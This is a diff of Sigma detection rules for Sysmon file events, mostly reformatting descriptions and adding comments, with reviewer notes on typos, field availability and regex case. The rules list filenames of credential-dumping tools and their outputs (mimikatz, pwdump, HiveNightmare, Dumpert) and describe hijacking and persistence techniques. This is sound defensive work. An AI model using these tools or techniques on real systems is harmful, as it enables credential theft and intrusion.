@@ -1,14 +1,9 @@ title: New Custom Shim Database Created id: ee63c85c-6d51-4d12-ad09-04e25877a947 status: test -description: 'Adversaries may establish persistence and/or elevate privileges by executing - malicious content triggered by application shims. - - The Microsoft Windows Application Compatibility Infrastructure/Framework (Application - Shim) was created to allow for backward compatibility of software as the operating - system codebase changes over time. - - ' +description: | + Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. + The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory - https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence diff --git a/sigma/sysmon/file/file_event/file_event_win_creation_scr_binary_file.yml b/sigma/sysmon/file/file_event/file_event_win_creation_scr_binary_file.yml index 0a4d8d025..25df3062b 100644 --- a/sigma/sysmon/file/file_event/file_event_win_creation_scr_binary_file.yml +++ b/sigma/sysmon/file/file_event/file_event_win_creation_scr_binary_file.yml 
@@ -1,13 +1,9 @@ title: Suspicious Screensaver Binary File Creation id: 97aa2e88-555c-450d-85a6-229bcd87efb8 status: test -description: 'Adversaries may establish persistence by executing malicious content - triggered by user inactivity. - - Screensavers are programs that execute after a configurable time of user inactivity - and consist of Portable Executable (PE) files with a .scr file extension - - ' +description: | + Adversaries may establish persistence by executing malicious content triggered by user inactivity. + Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md author: frack113 @@ -29,8 +25,9 @@ detection: filter_generic: Image|endswith: - \Kindle.exe - - \Bin\ccSvcHst.exe + - \Bin\ccSvcHst.exe # Symantec Endpoint Protection filter_tiworker: + # ParentCommandLine: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p Image|endswith: \TiWorker.exe TargetFilename|endswith: \uwfservicingscr.scr condition: file_event and (selection and not 1 of filter_*) diff --git a/sigma/sysmon/file/file_event/file_event_win_creation_system_file.yml b/sigma/sysmon/file/file_event/file_event_win_creation_system_file.yml index 490bcdcdc..565c6193b 100644 --- a/sigma/sysmon/file/file_event/file_event_win_creation_system_file.yml +++ b/sigma/sysmon/file/file_event/file_event_win_creation_system_file.yml 
@@ -1,8 +1,7 @@ title: Files With System Process Name In Unsuspected Locations id: d5866ddf-ce8f-4aea-b28e-d96485a20d3d status: test -description: Detects the creation of an executable with a system process name in folders - other than the system ones (System32, SysWOW64...etc). +description: Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc). author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) date: 2020/05/26 modified: 2023/11/10 @@ -117,7 +116,9 @@ detection: filter_main_explorer: TargetFilename|endswith: :\Windows\explorer.exe filter_main_msiexec: + # This filter handles system processes who are updated/installed using misexec. Image|endswith: :\WINDOWS\system32\msiexec.exe + # Add more processes if you find them or simply filter msiexec on its own. If the list grows big TargetFilename|endswith: - :\Program Files\PowerShell\7\pwsh.exe - :\Program Files\PowerShell\7-preview\pwsh.exe @@ -132,7 +133,6 @@ detection: condition: file_event and (selection and not 1 of filter_main_*) falsepositives: - System processes copied outside their default folders for testing purposes - - Third party software naming their software with the same names as the processes - mentioned here + - Third party software naming their software with the same names as the processes mentioned here level: high ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_creation_unquoted_service_path.yml b/sigma/sysmon/file/file_event/file_event_win_creation_unquoted_service_path.yml index 4939b9605..aaaf3f9b2 100644 --- a/sigma/sysmon/file/file_event/file_event_win_creation_unquoted_service_path.yml +++ b/sigma/sysmon/file/file_event/file_event_win_creation_unquoted_service_path.yml 
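Review bot: The new comment on `filter_main_msiexec` ends mid-sentence (`If the list grows big`), so a maintainer cannot tell what is actually being recommended. The advice to "simply filter msiexec on its own" also needs a caveat: the filter only checks `Image|endswith: :\WINDOWS\system32\msiexec.exe`, so dropping the `TargetFilename` list would exclude every executable installed by any MSI package, including an attacker-supplied one dropping a `svchost.exe`-style binary outside System32, which is exactly the masquerading this rule exists to catch. Suggest finishing the sentence along the lines of `# If the list grows big, consider filtering msiexec on its own, at the cost of missing system-named binaries dropped by untrusted MSI packages.`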
@@ -1,14 +1,9 @@ title: Creation Exe for Service with Unquoted Path id: 8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9 status: test -description: 'Adversaries may execute their own malicious payloads by hijacking vulnerable - file path references. - - Adversaries can take advantage of paths that lack surrounding quotations by placing - an executable in a higher level directory within the path, so that Windows will - choose the adversary''s executable to launch. - - ' +description: | + Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. + Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md author: frack113 @@ -25,6 +20,7 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection: + # Feel free to add more TargetFilename: C:\program.exe condition: file_event and selection falsepositives: diff --git a/sigma/sysmon/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml b/sigma/sysmon/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml index ca4c62939..41433d364 100644 --- a/sigma/sysmon/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml +++ b/sigma/sysmon/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml 
@@ -1,8 +1,7 @@ title: Cred Dump Tools Dropped Files id: 8fbf3271-1ef6-4e94-8210-03c2317947f6 status: test -description: Files with well-known filenames (parts of credential dump software or - files produced by them) creation +description: Files with well-known filenames (parts of credential dump software or files produced by them) creation references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment author: Teymur Kheirkhabarov, oscd.community @@ -24,33 +23,33 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection: - - TargetFilename|contains: - - \fgdump-log - - \kirbi - - \pwdump - - \pwhashes - - \wce_ccache - - \wce_krbtkts - - TargetFilename|endswith: - - \cachedump.exe - - \cachedump64.exe - - \DumpExt.dll - - \DumpSvc.exe - - \Dumpy.exe - - \fgexec.exe - - \lsremora.dll - - \lsremora64.dll - - \NTDS.out - - \procdump64.exe - - \pstgdump.exe - - \pwdump.exe - - \SAM.out - - \SECURITY.out - - \servpw.exe - - \servpw64.exe - - \SYSTEM.out - - \test.pwd - - \wceaux.dll + - TargetFilename|contains: + - \fgdump-log + - \kirbi + - \pwdump + - \pwhashes + - \wce_ccache + - \wce_krbtkts + - TargetFilename|endswith: + - \cachedump.exe + - \cachedump64.exe + - \DumpExt.dll + - \DumpSvc.exe + - \Dumpy.exe + - \fgexec.exe + - \lsremora.dll + - \lsremora64.dll + - \NTDS.out + - \procdump64.exe + - \pstgdump.exe + - \pwdump.exe + - \SAM.out + - \SECURITY.out + - \servpw.exe + - \servpw64.exe + - \SYSTEM.out + - \test.pwd + - \wceaux.dll condition: file_event and selection falsepositives: - Legitimate Administrator using tool for password recovery diff --git a/sigma/sysmon/file/file_event/file_event_win_cscript_wscript_dropper.yml b/sigma/sysmon/file/file_event/file_event_win_cscript_wscript_dropper.yml index b9dce5827..909b5748f 100644 --- a/sigma/sysmon/file/file_event/file_event_win_cscript_wscript_dropper.yml +++ b/sigma/sysmon/file/file_event/file_event_win_cscript_wscript_dropper.yml 
@@ -1,11 +1,10 @@ title: WScript or CScript Dropper - File id: 002bdb95-0cf1-46a6-9e08-d38c128a6127 related: - - id: cea72823-df4d-4567-950c-0b579eaf0846 - type: derived + - id: cea72823-df4d-4567-950c-0b579eaf0846 + type: derived status: test -description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe - or wscript.exe +description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe references: - WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846) author: Tim Shelton diff --git a/sigma/sysmon/file/file_event/file_event_win_csexec_service.yml b/sigma/sysmon/file/file_event/file_event_win_csexec_service.yml index c94a41e64..8e8a0994b 100644 --- a/sigma/sysmon/file/file_event/file_event_win_csexec_service.yml +++ b/sigma/sysmon/file/file_event/file_event_win_csexec_service.yml @@ -1,8 +1,7 @@ title: CSExec Service File Creation id: f0e2b768-5220-47dd-b891-d57b96fc0ec1 status: test -description: Detects default CSExec service filename which indicates CSExec service - installation and execution +description: Detects default CSExec service filename which indicates CSExec service installation and execution references: - https://github.com/malcomvetter/CSExec author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_csharp_compile_artefact.yml b/sigma/sysmon/file/file_event/file_event_win_csharp_compile_artefact.yml index 74792ef8e..f261d2c5e 100644 --- a/sigma/sysmon/file/file_event/file_event_win_csharp_compile_artefact.yml +++ b/sigma/sysmon/file/file_event/file_event_win_csharp_compile_artefact.yml 
@@ -1,15 +1,10 @@ title: Dynamic CSharp Compile Artefact id: e4a74e34-ecde-4aab-b2fb-9112dd01aed0 status: test -description: 'When C# is compiled dynamically, a .cmdline file will be created as - a part of the process. - - Certain processes are not typically observed compiling C# code, but can do so - without touching disk. - +description: | + When C# is compiled dynamically, a .cmdline file will be created as a part of the process. + Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile author: frack113 diff --git a/sigma/sysmon/file/file_event/file_event_win_dcom_iertutil_dll_hijack.yml b/sigma/sysmon/file/file_event/file_event_win_dcom_iertutil_dll_hijack.yml index 386481ceb..0a474f9e3 100644 --- a/sigma/sysmon/file/file_event/file_event_win_dcom_iertutil_dll_hijack.yml +++ b/sigma/sysmon/file/file_event/file_event_win_dcom_iertutil_dll_hijack.yml @@ -1,13 +1,12 @@ title: Potential DCOM InternetExplorer.Application DLL Hijack id: 2f7979ae-f82b-45af-ac1d-2b10e93b0baa related: - - id: e554f142-5cf3-4e55-ace9-a1b59e0def65 - type: obsoletes - - id: f354eba5-623b-450f-b073-0b5b2773b6aa - type: similar + - id: e554f142-5cf3-4e55-ace9-a1b59e0def65 + type: obsoletes + - id: f354eba5-623b-450f-b073-0b5b2773b6aa + type: similar status: test -description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application - Class over the network +description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network references: - https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga 
diff --git a/sigma/sysmon/file/file_event/file_event_win_dll_sideloading_space_path.yml b/sigma/sysmon/file/file_event/file_event_win_dll_sideloading_space_path.yml index 4c3a90044..525e8afb2 100644 --- a/sigma/sysmon/file/file_event/file_event_win_dll_sideloading_space_path.yml +++ b/sigma/sysmon/file/file_event/file_event_win_dll_sideloading_space_path.yml @@ -1,13 +1,9 @@ title: DLL Search Order Hijackig Via Additional Space in Path id: b6f91281-20aa-446a-b986-38a92813a18f status: test -description: 'Detects when an attacker create a similar folder structure to windows - system folders such as (Windows, Program Files...) - - but with a space in order to trick DLL load search order and perform a "DLL Search - Order Hijacking" attack - - ' +description: | + Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) + but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack references: - https://twitter.com/cyb3rops/status/1552932770464292864 - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows diff --git a/sigma/sysmon/file/file_event/file_event_win_dump_file_susp_creation.yml b/sigma/sysmon/file/file_event/file_event_win_dump_file_susp_creation.yml index 977db046d..2406a1802 100644 --- a/sigma/sysmon/file/file_event/file_event_win_dump_file_susp_creation.yml +++ b/sigma/sysmon/file/file_event/file_event_win_dump_file_susp_creation.yml 
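Review bot: The title retained on the new side still reads `DLL Search Order Hijackig Via Additional Space in Path`, and since the title becomes the alert name in most backends the typo propagates into every detection; it should be `DLL Search Order Hijacking Via Additional Space in Path`. The rewritten description also has a subject/verb mismatch (`when an attacker create`) — `when an attacker creates a folder structure similar to Windows system folders` reads cleanly.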
@@ -1,13 +1,10 @@ title: Potentially Suspicious DMP/HDMP File Creation id: aba15bdd-657f-422a-bab3-ac2d2a0d6f1c related: - - id: 3a525307-d100-48ae-b3b9-0964699d7f97 - type: similar + - id: 3a525307-d100-48ae-b3b9-0964699d7f97 + type: similar status: experimental -description: Detects the creation of a file with the ".dmp"/".hdmp" extension by a - shell or scripting application such as "cmd", "powershell", etc. Often created - by software during a crash. Memory dumps can sometimes contain sensitive information - such as credentials. It's best to determine the source of the crash. +description: Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash. references: - https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps author: Nasreddine Bencherchali (Nextron Systems) @@ -36,7 +33,6 @@ detection: - .hdmp condition: file_event and selection falsepositives: - - Some administrative PowerShell or VB scripts might have the ability to collect - dumps and move them to other folders which might trigger a false positive. + - Some administrative PowerShell or VB scripts might have the ability to collect dumps and move them to other folders which might trigger a false positive. level: medium ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_errorhandler_persistence.yml b/sigma/sysmon/file/file_event/file_event_win_errorhandler_persistence.yml index 739b3184b..1a2f35183 100644 --- a/sigma/sysmon/file/file_event/file_event_win_errorhandler_persistence.yml +++ b/sigma/sysmon/file/file_event/file_event_win_errorhandler_persistence.yml 
@@ -1,13 +1,9 @@ title: Potential Persistence Attempt Via ErrorHandler.Cmd id: 15904280-565c-4b73-9303-3291f964e7f9 status: test -description: 'Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" - directory which could be used as a method of persistence - - The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some - tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason. - - ' +description: | + Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence + The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason. references: - https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/ - https://github.com/last-byte/PersistenceSniper diff --git a/sigma/sysmon/file/file_event/file_event_win_exchange_webshell_drop.yml b/sigma/sysmon/file/file_event/file_event_win_exchange_webshell_drop.yml index 73562eb92..918085d25 100644 --- a/sigma/sysmon/file/file_event/file_event_win_exchange_webshell_drop.yml +++ b/sigma/sysmon/file/file_event/file_event_win_exchange_webshell_drop.yml 
@@ -1,11 +1,10 @@ title: Suspicious ASPX File Drop by Exchange id: bd1212e5-78da-431e-95fa-c58e3237a8e6 related: - - id: 6b269392-9eba-40b5-acb6-55c882b20ba6 - type: similar + - id: 6b269392-9eba-40b5-acb6-55c882b20ba6 + type: similar status: test -description: Detects suspicious file type dropped by an Exchange component in IIS - into a suspicious folder +description: Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder references: - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/ - https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html @@ -25,10 +24,10 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \w3wp.exe - CommandLine|contains: MSExchange + CommandLine|contains: MSExchange TargetFilename|contains: - - FrontEnd\HttpProxy\ - - \inetpub\wwwroot\aspnet_client\ + - FrontEnd\HttpProxy\ # from GTSC and MSTI reports + - \inetpub\wwwroot\aspnet_client\ # from GTSC report selection_types: TargetFilename|endswith: - .aspx diff --git a/sigma/sysmon/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml b/sigma/sysmon/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml index 92e2d88b0..129cc4e80 100644 --- a/sigma/sysmon/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml +++ b/sigma/sysmon/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml @@ -1,8 +1,8 @@ title: Suspicious File Drop by Exchange id: 6b269392-9eba-40b5-acb6-55c882b20ba6 related: - - id: bd1212e5-78da-431e-95fa-c58e3237a8e6 - type: similar + - id: bd1212e5-78da-431e-95fa-c58e3237a8e6 + type: similar status: test description: Detects suspicious file type dropped by an Exchange component in IIS references: 
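Review bot: `CommandLine|contains: MSExchange` is ANDed into `selection` of a rule bound to `Channel: Microsoft-Windows-Sysmon/Operational` / `EventID: 11`, but Sysmon FileCreate events record Image and TargetFilename and carry no CommandLine field, so on plain Sysmon telemetry this condition can never be satisfied and the rule will not fire; the sibling `file_event_win_exchange_webshell_drop_suspicious.yml` selection carries the same field. Unless the ingest pipeline enriches file events with the creating process's command line, the line should become a documented optional, the way this update handles `RemoteRegistry` in `file_event_win_hktl_remote_cred_dump.yml`, e.g. `# CommandLine|contains: MSExchange  # uncomment only if file events are enriched with the process command line`. The `Image|endswith: \w3wp.exe` check plus the `TargetFilename|contains` paths already carry the detection on their own.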
@@ -26,7 +26,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \w3wp.exe - CommandLine|contains: MSExchange + CommandLine|contains: MSExchange selection_types: TargetFilename|endswith: - .aspx diff --git a/sigma/sysmon/file/file_event/file_event_win_gotoopener_artefact.yml b/sigma/sysmon/file/file_event/file_event_win_gotoopener_artefact.yml index 600b19b85..d18382b2a 100644 --- a/sigma/sysmon/file/file_event/file_event_win_gotoopener_artefact.yml +++ b/sigma/sysmon/file/file_event/file_event_win_gotoopener_artefact.yml 
@@ -1,18 +1,10 @@ title: GoToAssist Temporary Installation Artefact id: 5d756aee-ad3e-4306-ad95-cb1abec48de2 status: test -description: 'An adversary may use legitimate desktop support and remote access software, - such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive - command and control channel to target systems within networks. - - These services are commonly used as legitimate technical support software, and - may be allowed by application control within a target environment. - - Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared - with other legitimate software commonly used by adversaries. (Citation: Symantec - Living off the Land) - - ' +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows author: frack113 @@ -29,8 +21,7 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection: - TargetFilename|contains: \AppData\Local\Temp\LogMeInInc\GoToAssist Remote - Support Expert\ + TargetFilename|contains: \AppData\Local\Temp\LogMeInInc\GoToAssist Remote Support Expert\ condition: file_event and selection falsepositives: - Legitimate use 
diff --git a/sigma/sysmon/file/file_event/file_event_win_hktl_dumpert.yml b/sigma/sysmon/file/file_event/file_event_win_hktl_dumpert.yml index 373d12571..e24be70ca 100644 --- a/sigma/sysmon/file/file_event/file_event_win_hktl_dumpert.yml +++ b/sigma/sysmon/file/file_event/file_event_win_hktl_dumpert.yml @@ -1,11 +1,10 @@ title: HackTool - Dumpert Process Dumper Default File id: 93d94efc-d7ad-4161-ad7d-1638c4f908d8 related: - - id: 2704ab9e-afe2-4854-a3b1-0c0706d03578 - type: derived + - id: 2704ab9e-afe2-4854-a3b1-0c0706d03578 + type: derived status: test -description: Detects the creation of the default dump file used by Outflank Dumpert - tool. A process dumper, which dumps the lsass process memory +description: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory references: - https://github.com/outflanknl/Dumpert - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/ diff --git a/sigma/sysmon/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml b/sigma/sysmon/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml index 82d39ad07..71e2629fa 100644 --- a/sigma/sysmon/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml +++ b/sigma/sysmon/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml 
@@ -23,14 +23,14 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection: - - TargetFilename|contains: - - \hive_sam_ - - \SAM-2021- - - \SAM-2022- - - \SAM-2023- - - \SAM-haxx - - \Sam.save - - TargetFilename: C:\windows\temp\sam + - TargetFilename|contains: + - \hive_sam_ # Go version + - \SAM-2021- # C++ version + - \SAM-2022- # C++ version + - \SAM-2023- # C++ version + - \SAM-haxx # Early C++ versions + - \Sam.save # PowerShell version + - TargetFilename: C:\windows\temp\sam # C# version of HiveNightmare condition: file_event and selection falsepositives: - Files that accidentally contain these strings diff --git a/sigma/sysmon/file/file_event/file_event_win_hktl_mimikatz_files.yml b/sigma/sysmon/file/file_event/file_event_win_hktl_mimikatz_files.yml index 473bd2254..9da7f4af2 100644 --- a/sigma/sysmon/file/file_event/file_event_win_hktl_mimikatz_files.yml +++ b/sigma/sysmon/file/file_event/file_event_win_hktl_mimikatz_files.yml @@ -1,11 +1,10 @@ title: Mimikatz Kirbi File Creation id: 9e099d99-44c2-42b6-a6d8-54c3545cab29 related: - - id: 034affe8-6170-11ec-844f-0f78aa0c4d66 - type: obsoletes + - id: 034affe8-6170-11ec-844f-0f78aa0c4d66 + type: obsoletes status: test -description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", - etc. +description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc. references: - https://cobalt.io/blog/kerberoast-attack-techniques - https://pentestlab.blog/2019/10/21/persistence-security-support-provider/ @@ -25,8 +24,8 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: TargetFilename|endswith: - - .kirbi - - mimilsa.log + - .kirbi # Kerberos tickets + - mimilsa.log # MemSSP default file condition: file_event and selection falsepositives: - Unlikely 
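Review bot: The year-suffixed indicators for the C++ HiveNightmare build stop at `\SAM-2023-`, so a default run that writes `SAM-2024-...` or later no longer matches and the list silently decays every January. Either add `\SAM-2024-` now or replace the three year entries with a non-expiring pattern as an additional list entry in the existing list-of-maps form, e.g. `- TargetFilename|re: \\SAM-20\d{2}-`, leaving the Go, PowerShell and C# indicators as they are. Whichever is chosen, a comment such as `# year-stamped C++ output; regex avoids yearly maintenance` would explain the choice to the next maintainer.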
diff --git a/sigma/sysmon/file/file_event/file_event_win_hktl_nppspy.yml b/sigma/sysmon/file/file_event/file_event_win_hktl_nppspy.yml index c4f5ea7bc..2633b2fa3 100644 --- a/sigma/sysmon/file/file_event/file_event_win_hktl_nppspy.yml +++ b/sigma/sysmon/file/file_event/file_event_win_hktl_nppspy.yml @@ -1,8 +1,7 @@ title: NPPSpy Hacktool Usage id: cad1fe90-2406-44dc-bd03-59d0b58fe722 status: test -description: Detects the use of NPPSpy hacktool that stores cleartext passwords of - users that logged in to a local file +description: Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy - https://twitter.com/0gtweet/status/1465282548494487554 diff --git a/sigma/sysmon/file/file_event/file_event_win_hktl_powerup_dllhijacking.yml b/sigma/sysmon/file/file_event/file_event_win_hktl_powerup_dllhijacking.yml index 0ac5bd50d..17756c382 100644 --- a/sigma/sysmon/file/file_event/file_event_win_hktl_powerup_dllhijacking.yml +++ b/sigma/sysmon/file/file_event/file_event_win_hktl_powerup_dllhijacking.yml 
@@ -1,16 +1,10 @@ title: Powerup Write Hijack DLL id: 602a1f13-c640-4d73-b053-be9a2fa58b96 status: test -description: 'Powerup tool''s Write Hijack DLL exploits DLL hijacking for privilege - escalation. - - In it''s default mode, it builds a self deleting .bat file which executes malicious - command. - - The detection rule relies on creation of the malicious bat file (debug.bat by - default). - - ' +description: | + Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. + In it's default mode, it builds a self deleting .bat file which executes malicious command. + The detection rule relies on creation of the malicious bat file (debug.bat by default). references: - https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/ author: Subhash Popuri (@pbssubhash) @@ -36,6 +30,6 @@ detection: TargetFilename|endswith: .bat condition: file_event and selection falsepositives: - - Any powershell script that creates bat files + - Any powershell script that creates bat files # highly unlikely (untested) level: high ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_hktl_remote_cred_dump.yml b/sigma/sysmon/file/file_event/file_event_win_hktl_remote_cred_dump.yml index 5a6b3116e..ff5206ede 100644 --- a/sigma/sysmon/file/file_event/file_event_win_hktl_remote_cred_dump.yml +++ b/sigma/sysmon/file/file_event/file_event_win_hktl_remote_cred_dump.yml @@ -1,8 +1,7 @@ title: Potential Remote Credential Dumping Activity id: 6e2a900a-ced9-4e4a-a9c2-13e706f9518a status: test -description: Detects default filenames output from the execution of CrackMapExec and - Impacket-secretsdump against an endpoint. +description: Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint. references: - https://github.com/Porchetta-Industries/CrackMapExec - https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py 
@@ -22,6 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \svchost.exe + # CommandLine|contains: 'RemoteRegistry' # Uncomment this line if you collect CommandLine data for files events from more accuracy TargetFilename|re: \\Windows\\System32\\[a-zA-Z0-9]{8}\.tmp$ condition: file_event and selection falsepositives: diff --git a/sigma/sysmon/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml b/sigma/sysmon/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml index 19f1c6d50..1ef6e4b93 100644 --- a/sigma/sysmon/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml +++ b/sigma/sysmon/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml @@ -1,9 +1,7 @@ title: Potential Initial Access via DLL Search Order Hijacking id: dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c status: test -description: Detects attempts to create a DLL file to a known desktop application - dependencies folder such as Slack, Teams or OneDrive and by an unusual process. - This may indicate an attempt to load a malicious module via DLL search order hijacking. +description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking. references: - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc - https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0 @@ -26,6 +24,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: + # add more processes when you find them - \winword.exe - \excel.exe - \powerpnt.exe 
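Review bot: `TargetFilename|re: \\Windows\\System32\\[a-zA-Z0-9]{8}\.tmp$` is, by Sigma's default, a case-sensitive regular expression, while Windows paths arrive in mixed case (this same rule set writes `:\WINDOWS\system32\` elsewhere), so an event for `C:\WINDOWS\system32\abcdefgh.tmp` written by a secretsdump session would not match unless the backend normalizes case; consider `(?i)` at the start of the pattern, or the `|re|i` sub-modifier where the backend supports it. The new comment also reads `from more accuracy` where `for more accuracy` is meant, and it should warn that Sysmon Event ID 11 carries no CommandLine field, so the commented `CommandLine|contains: 'RemoteRegistry'` line only works where file events are enriched with the process command line, e.g. `# Uncomment only if your pipeline enriches file events with the process command line (Sysmon EID 11 alone does not carry it)`.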
@@ -45,6 +44,7 @@ detection: - \Users\ - \AppData\ TargetFilename|contains: + # add more suspicious paths when you find them - \Microsoft\OneDrive\ - \Microsoft OneDrive\ - \Microsoft\Teams\ diff --git a/sigma/sysmon/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml b/sigma/sysmon/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml index c1b79aaa2..04ba32f61 100644 --- a/sigma/sysmon/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml +++ b/sigma/sysmon/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml @@ -1,9 +1,9 @@ title: Malicious DLL File Dropped in the Teams or OneDrive Folder id: 1908fcc1-1b92-4272-8214-0fbaf2fa5163 status: test -description: "Detects creation of a malicious DLL file in the location where the OneDrive\ - \ or Team applications\nUpon execution of the Teams or OneDrive application, the\ - \ dropped malicious DLL file (\u201Ciphlpapi.dll\u201D) is sideloaded\n" +description: | + Detects creation of a malicious DLL file in the location where the OneDrive or Team applications + Upon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded references: - https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ author: frack113 diff --git a/sigma/sysmon/file/file_event/file_event_win_iso_file_mount.yml b/sigma/sysmon/file/file_event/file_event_win_iso_file_mount.yml index 95717f6cc..5ff986bad 100644 --- 